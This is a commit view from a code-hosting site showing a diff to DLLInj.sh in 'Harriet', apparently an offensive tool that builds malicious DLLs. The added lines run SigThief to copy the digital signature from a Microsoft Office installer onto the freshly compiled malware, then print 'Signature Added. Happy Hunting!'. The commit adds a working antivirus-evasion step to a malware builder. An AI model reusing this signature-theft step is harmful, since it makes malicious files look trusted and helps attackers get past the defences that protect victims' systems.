Forráskód Böngészése

Update DLLInj.sh

Added signing to DLL module
assume-breach 2 éve
szülő
commit
126413d067
1 módosított fájl, 8 hozzáadás és 0 törlés
  1. 8 0
      Harriet/Harriet/DLLInj/DLLInj.sh

+ 8 - 0
Harriet/Harriet/DLLInj/DLLInj.sh

@@ -144,3 +144,11 @@ echo ""
 sleep 2
 rm shell*
 echo -e ${yellow}"***Malware Compiled***"${clear}
+echo ""
+echo -e ${yellow}"***Signing DLL***"${clear}
+python3 Harriet/Resources/SigThief/sigthief.py -i Harriet/Resources/OfficeSetup.exe -t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+mv signed$MALWARE $MALWARE
+echo ""
+echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
+echo ""
+